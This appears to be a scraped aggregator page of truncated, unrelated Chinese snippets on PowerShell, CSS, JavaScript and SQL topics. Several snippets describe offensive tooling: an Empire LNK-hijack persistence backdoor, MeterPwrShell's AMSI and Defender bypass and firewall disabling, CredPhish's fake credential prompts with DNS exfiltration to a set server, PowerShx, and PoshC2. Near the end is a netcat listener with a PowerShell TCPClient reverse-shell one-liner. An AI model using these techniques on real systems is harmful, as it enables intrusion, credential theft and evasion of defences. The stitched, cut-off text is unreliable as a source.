用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码,原始应用程序仍然启动,原始图标保留,并且没有powershell.exe窗口弹出。...1、安装后门 这次需要用到powershell攻击框架Empire,使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本...-LNKPath是要利用的lnk的路径,每次打开这个lnk文件时都会执行原始的应用程序和 -EncScript后面的恶意powershell代码 先通过empire生成反弹的powershell代码 ....2、实现原理 它会将原来快捷目标修改为powershell.exe的地址,并且利用powershell去运行navicat程序与恶意代码。 ? 解密后的代码 ?...4、总结 利用快捷方式去攻击,已经是一个很老的话题了,但是有时候渗透中添加启动项/服务/任务计划失败的情况下可以尝试用此方法,劫持一个经常使用的程序快捷方式,达到权限维持的效果,windows下基于powershell
关于MeterPwrShell MeterPwrShell是一款功能强大的自动化工具,可以帮助广大研究人员以自动化的形式生成完美的PowerShell Payload。...MeterPwrShell基于Metasploit框架和amsi.fail实现其功能,可以生成PowerShell One-Liner,并能够创建Meterpreter Shell,而且还可以绕过AMSI...功能介绍 使用PrependMigrate实现自动化免杀; 自动从普通用户提权为SYSTEM权限; 禁用所有的防火墙配置; 绕过Windows Defender实时保护功能; Payload免杀; 绕过...可轻松绕过Windows Defender; 工具要求 Kali Linux、Ubuntu或Debian; Metasploit框架; 接入网络(目标主机和攻击者主机都需要); 工具下载 广大研究人员可以使用下列命令将该项目源码克隆至本地...: git clone https://github.com/GetRektBoy724/MeterPwrShell.git 工具使用 # .
CredPhish 是一个 PowerShell 脚本,旨在调用凭据提示和泄露密码。...默认情况下,CredPhish 将使用 Resolve-DnsName(PowerShell 内置的 DNS 解析器)来窃取凭据。...在解析 DNS 查询之前,DNS 服务器将剥离十六进制子域以避免创建数十个错误响应。...# exfil 地址 $exfilServer = "192.168.56.112" 接下来,几个变量定义了提示将如何呈现给毫无戒心的目标用户。...PowerShell 执行它。
注册表编辑器还不支持按住Shift进行多选,所以只能使用脚本进行批量删除。!!!友情提示,删除之前请进行注册表备份,或者你百分比确定你的代码没有问题,再执行,否则发生的任何损失,本文概不负责!!!...注册表路径以及如何获得注册表子项在PowerShell中注册表也有路径,跟我们文件和文件夹路径类似,上面的注册表项的路径可以表示为:REGISTRY::\HKEY_USERS\S-1-5-21-3610452307...那我们如何获得该注册表路径下面的所有子项呢?...基于条件过滤删除项因为我们要删除的子项名称中都包含“kzip_main.exe”这样的字符,所以我们使用Where-Object命令(别名where或者?)...命令选择出来要删除的元素以后,我们可以使用ForEach_Object命令(别名foreach或者%)遍历该数组删除所有元素,代码如下:$items | % {rm -Force -Recurse $_
背景: 开发的PowerShell 脚本需要使用Invoke-RestMethod命令,发现在老的服务器上不支持这一命令,经过查询得知由于PS版本的问题。...powershell需要.NET环境的支持,同时支持.NET对象。当前powershell有四版本,分别为1.0,2.0,3.0 ,4.0 。 ...碰巧我遇到一个使用PS脚本的地方需要使用3.0及其以上,微软这方面的版本升级做的很好只需要简单几个步骤就可以实现升级,并且实现了向前兼容(很遗憾32位版本的只能向后兼容)。...下面就2.0升级3.0的升级步骤进行了介绍: Windows 7 和 Windows Server 2008 R2 内核版本同为6.1,以下步骤说明如何在运行 Windows 7 SP1 和 Windows...总结: 本文主要是介绍在windows 2008 或者7 如何升级powershell,碰巧遇到了问题,所以将这个方案记录下来,因为现在很多服务器都是2008r2 ,为日后的运维和升级提供依据参考。
如何使用PowerShell批量删除注册表项 问题描述 注册表路径以及如何获得注册表子项 基于条件过滤删除项 For循环删除子项 问题描述 卸载了可牛压缩软件以后,发现右键菜单中仍然有可牛压缩的选项。...注册表编辑器还不支持按住Shift进行多选,所以只能使用脚本进行批量删除。 !!!...注册表路径以及如何获得注册表子项 在PowerShell中注册表也有路径,跟我们文件和文件夹路径类似,上面的注册表项的路径可以表示为: REGISTRY::\HKEY_USERS\S-1-5-21-3610452307...那我们如何获得该注册表路径下面的所有子项呢?...基于条件过滤删除项 因为我们要删除的子项名称中都包含“kzip_main.exe”这样的字符,所以我们使用Where-Object命令(别名where或者?)
创建高级动画听起来是一个很难的话题,但好消息是,在CSS中,可以将多个简单的动画相互叠加,以创建一个更复杂的动画 在这节课中,我们会学习如下几点: 什么是贝塞尔曲线,以及如何用一行CSS来创建一个 "复杂..."的动画 如何将动画相互叠加以创建一个高级动画 如何通过应用上面学到的两点来创建一个过山车动画 什么是贝塞尔曲线 CSS中的 cubic-bezier 函数是一个缓动函数,可以让我们完全控制动画在时间上的表现...x { to { left: 40vw; } 将其添加到球路径的 animation 属性中,如下所示 animation: x 4s linear forwards y轴动画是我们将使用...cubic-bezier函数的部分。...总结 在本节中,我们介绍了如何结合多个关键帧来创建一个复杂的动画路径。我们还介绍了贝塞尔以及如何使用它们来创建你自己的缓动函数。建议大家自己多多动手,才能更好的掌握 css 动画。
关于PowerShx PowerShx是一款功能强大的PowerShell软件,在该工具的帮助下,广大研究人员可以在目标主机上摆脱任何软件的限制从而执行PowerShell代码。...功能介绍 使用exe、installuitl.exe、regsvcs.exe、regasm.exe、regsvr*32.exe来运行PowerShel; 在不需要exe或powershell_ise.exe...的情况下运行PowerShell;AMSI绕过功能; 直接通过命令行工具或PowerShell文件运行PowerShell脚本; 导入PowerShell模块和执行PowerShell Cmdlet;...工具依赖 · .Net 4 工具使用 .dll版本 rundll32 rundll32 PowerShx.dll,main -e 需要运行的PS脚本...下面的例子中演示了如何在Handle()方法中调用Payload: private void Handle(Options options) { // Pre-execution before user
构造函数 在JavaScript中,函数是一等公民,这意味着它们可以像任何其他数据类型一样被执行。 构造函数就是利用了这一点,允许你从字符串中创建函数。...就像在字符串中编写函数声明,然后从中创建一个真正的函数。...以下是使用构造函数的优点: 动态代码执行: 我们可以动态地去创建和执行我们的代码,这在我们需要在运行时生成函数或插件的场景非常好用。...使用构造函数的缺点和注意事项 以下是使用构造函数的缺点: 安全风险:我们如果直接使用 ,用户提供的字符串来创建函数可能引发安全风险。恶意代码可能会被直接注入和执行。我们应该始终验证和清理用户输入。...例如,在内容管理系统中,用户可能为其网站创建自定义模板或扩展,使用构造函数可以将其转换为可执行函数。
本文将介绍动态函数的概念,探讨几种常用的方法来创建动态函数,并分享一些动态函数的应用场景。 动态函数的概念 动态函数是在运行时创建的函数,其代码可以动态生成或修改。...代码示例 在本节中,我们将分别介绍使用 eval()、Function 构造函数和箭头函数这几种方法来创建动态函数,并提供相应的代码示例。...1 使用 eval() 创建动态函数: // 动态生成函数 function createDynamicFunctionEval() { const functionBody = 'console.log...} // 调用动态函数 const dynamicFuncEval = createDynamicFunctionEval(); dynamicFuncEval(); 2 使用 Function 构造函数创建动态函数...(); 3 使用箭头函数创建动态函数 // 动态生成函数 function createDynamicArrowFunction() { const functionBody = 'console.log
一、介绍ImportExcel模块可以理解为基于PowerShell环境操作Excel的强大类库,使用它可以在 Windows、Linux 和 Mac 上都可以使用。...创建表、数据透视表、汇总、图表等操作变得更加容易。...另外比较好的一点是使用该模块允许用户无需安装微软的 Office 或者使用 COM 对象就能直接操作 Excel 文件,这样对于没有安装office的服务器也可以直接使用。...支持给Excel添加图表:还可以在 Excel 工作表中创建图表,例如柱状图、折线图等。数据透视表:能够生成数据透视表并将其写入 Excel 文件中。...跨平台:ImportExcel 不依赖于 Microsoft Office,可以在 Windows、Linux 和 macOS 上运行 PowerShell 时直接使用该模块。
不过,使用 PowerShell 创建 WinUI3 GUI 也是可以的。前提条件安装最新版本的 .NET SDK 和 Visual Studio。...第一步:创建 WinUI3 项目打开 Visual Studio。创建一个新的 WinUI3 应用程序项目。...第二步:创建 PowerShell 脚本打开一个新的 PowerShell 脚本文件。...使用 Add-Type 命令加载 WinUI3 相关的 DLL:Add-Type -Path "path\to\Microsoft.WinUI.dll"# 加载其他需要的 DLL使用反射创建...因此,调试 PowerShell 脚本和 WinUI3 应用程序需要一些时间和耐心。
不过在C#中,我们需要对程序代码进行编译才可以使用和执行,即编译型语言,这是它和PowerShell这种解释型脚本语言有很大区别。...接下来,我们需要将脚本添加到新创建的pipeline中,并对通信信道进行排序,最后通过Invoke()方法执行我们的脚本命令。...最终的结果将会被追加到我们的字符串生成器中,然后作为字符串发回给调用函数,以便显示在控制台的输出结果中。这也就是为什么我们要在命令中添加“Out-String”的原因。 怎么样,整个过程很简单吧?...接下来,创建一个简单地测试脚本: test.ps1: echo "Hello from powershell-less" echo "PID: $pid" 然后运行该脚本: 没错,我们成功了!...我们成功地在不直接使用powershell.exe的情况下调用并执行了我们的脚本代码。
当然,这只是一个实例,加入打算备份每一个数据库在备份在各自的数据库实例的服务器上,又该如何修改上面的语句那?...假如你的工作中包含了备份数据库,那么使用PowerShell来备份数据库就是一种值得使用的方式了,尤其是当你数据库服务器上都有PowerShell的时候。...Out-GridView 如何使用 下面这个例子使用了Out-GridView 命令,这个场景下,我选择三个数据库,然后会只备份我选择的三个。 ? 另一个很有用的功能就是过滤。...注意:这是在PowerShell ISE中,其他的编辑器可能会有不同的弹出参数的的触发。比如我尝试了在PowerShell console 中需要用“Crtl”+空格键才会触发。...本文中显示的所有代码都是使用SqlServer PowerShell模块完成的,该模块使用SSMS 2016(16.5+),而我的机器运行的是PowerShell的5.1版本。
当然,这只是一个实例,加入打算备份每一个数据库在备份在各自的数据库实例的服务器上,又该如何修改上面的语句那?...假如你的工作中包含了备份数据库,那么使用PowerShell来备份数据库就是一种值得使用的方式了,尤其是当你数据库服务器上都有PowerShell的时候。...Out-GridView 如何使用 下面这个例子使用了Out-GridView 命令,这个场景下,我选择三个数据库,然后会只备份我选择的三个。 另一个很有用的功能就是过滤。...比如我尝试了在PowerShell console 中需要用“Crtl”+空格键才会触发。...本文中显示的所有代码都是使用SqlServer PowerShell模块完成的,该模块使用SSMS 2016(16.5+),而我的机器运行的是PowerShell的5.1版本。
Windows操作系统在全球市场上的占比是大家有目共睹的,而现代Windows平台都默认安装了PowerShell,而且系统管理员还可以毫无限制地访问和使用PowerShell终端。...BenTurner 和 Dave Hardy 这两位安全研究人员开发出了一款基于 PowerShell 和C#的命令控制工具- PoshC2 ,这款工具不仅实现了各种各样的攻击技术,而且使用起来也非常简单...PoshC2还可以生成各种功能强大的Payload,研究人员可以在渗透测试或安全评估过程中使用这些Payload。 ?...与PowerShell会话类似,它也能接收任何的PowerShell命令或PoshC2命令,相关命令可以在帮助菜单中找到: ?...总结 PoshC2最大的优势就在于它使用的是PowerShell,因此它的植入程序不需要任何其他的依赖组件,这种特性与其他很多用Python开发的命令控制工具很相似。
大家好,在前面的几篇相关文章里,我们一起学习了如何使用类的方式声明组件,以及如何属性传值和处理本地数据状态,本篇文章我们一起学习如何使用函数的方式进行声明组件。...如何创建简单的函数组件 基于上篇文章的例子,我们来尝试下通过函数的方式改写下公共组件:头组件、底部组件、内容组件等。...初识 Hooks 文章开头我提及到了使用 Hooks 技术,其作用让函数组件变得强大起来,它可以让 react 函数组件也拥有状态,让我们用现有的 JavaScript 技术就能快速上手,让我们获取数据...、更改状态是如此的轻松,接下来我们来初步实现一个Hook的例子: 1、首先我们在 component 目录下创建 MyName 目录,创建 MyName 组件文件。...但是我们可以使用 Hook 函数进行操作数据状态,我们可以使用 useState() 来初始我们的数据状态,并通过函数的方式返回相关内容: 当前数据状态 操作数据状态的方法 3、接下来我们可以使用 ES6
nc -lnvup 53 powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily...powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient...使用场景请自行发挥。
这里有一段代码演示如何查询和获取SQL数据,只需非常简单正确的配置你的账户信息、服务器地址及SQL语句就行: $Database = 'Name_Of_SQLDatabase' $Server =...Database = 'DemoDB' $Server = '"WIN-AHAU9NO5R6U\DOG"' $UserName = 'kk' $Password = '123456' #创建连接对象...$SqlConn = New-Object System.Data.SqlClient.SqlConnection #使用账号连接MSSQL $SqlConn.ConnectionString =
本文告诉大家如何在 dotnet core 通过 Host PowerShell 的方法使用 PowerShell 脚本 本文提供的方法需要在 dotnet core 2.1 和以上的版本,对于 dotnet...core 2.1 以下暂时只能通过命令行调用 PowerShell.exe 的方法调用 在使用之前请创建一个 dotnet core 程序然后安装下面几个 Nuget 库 Microsoft.PowerShell.Commands.Diagnostics...可以快速使用 PowerShell 脚本 使用 PowerShell.Create() 创建一个 PowerShell 类,在 PowerShell 类先添加脚本,然后就可以运行,运行函数会返回运行的返回的内容...System.Management.Automation.ActionPreference], [System.Management.Automation.AliasAttribute]).FullName 可以直接调用上面封装的函数...本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。
领取专属 10元无门槛券
手把手带您无忧上云